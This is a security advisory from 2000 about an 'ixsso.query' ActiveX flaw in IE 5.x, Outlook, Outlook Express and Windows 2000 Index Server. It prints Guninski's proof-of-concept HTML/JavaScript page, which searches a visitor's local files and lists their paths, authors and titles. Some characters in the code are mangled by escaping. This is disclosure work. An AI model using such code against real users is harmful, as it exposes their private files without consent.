Microsoft IE 5.x, Outlook, Outlook Express, and Windows 2000 with Index Server Vulnerable to Remote File Searching


Reported November 10, 2000 by Georgi Guninski

VERSIONS AFFECTED
  • Microsoft Internet Explorer 5.x
  • Microsoft Outlook Express
  • Microsoft Outlook
  • Windows 2000 with Microsoft Index Server 

DESCRIPTION

An issue with the "ixsso.query" ActiveX object causes Internet Explorer 5.x, Outlook, Outlook Express, and Windows 2000 with Microsoft Index Server to be vulnerable to unauthorized file searching.

DEMONSTRATION

Georgi Guninski made the following code available;

--------indexserv1.html-------------------------------------------

<INPUT TYPE="BUTTON"
      VALUE="Search"
      onclick="g(document.all.query.value)">
      <INPUT TYPE="BUTTON" VALUE="Find *.txt files"
      onclick="g('@filename =
      *.txt')">
      
      <SCRIPT>
      function g(q1)
      \{
      qu=new ActiveXObject("ixsso.query");
      qu.Catalog="System";
      //qu.query="@contents name";
      //qu.query="#filename .htm or name near test";
      //qu.query='@filename = *.doc ';
      qu.query=q1;
      qu.Columns="filename, path, doctitle, doccomments, docauthor,
      size";
      rs=qu.CreateRecordset("nonsequential");
      //alert("Records: "+rs.RecordCount);
      doc=window.frames\[0\].document;
      doc.writeln("SEARCH RESULTS Records: "+rs.RecordCount+"");
      doc.writeln("<TABLE BORDER=2>");
      doc.writeln("<TR><TD>Path</TD><TD>size</TD>
&l;TD>DocAuthor</TD><TD>DocTitle</TD></TR>");
      while (!rs.EOF)
      \{
      doc.writeln("<TR><TD><A TARGET='_blank'
      HREF='file://"+rs("Path")+"'</A>"+rs("Path")+"</TD>
<TD>"+rs("size")+"</TD><TD>"+rs("DocAuthor")+"</TD>
<TD>"+rs("DocTitle")+"</TD></TR>");
      rs.MoveNext();
      \}
      doc.writeln("</TABLE>");
      \}
      //setTimeout("g()",1000);
      </SCRIPT>
		

---------------------------------------------------------------------

VENDOR RESPONSE

Georgi Guninski reported this issue to Microsoft on November 6, 2000.  I contacted Microsoft as well and they are working on a patch.  Unfortunately, Microsoft was only given four days to address the issue and has not completed the patch.

CREDIT
Discovered by
Georgi Guninski

Hide comments

Comments

  • Allowed HTML tags: <em> <strong> <blockquote> <br> <p>

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.
Publish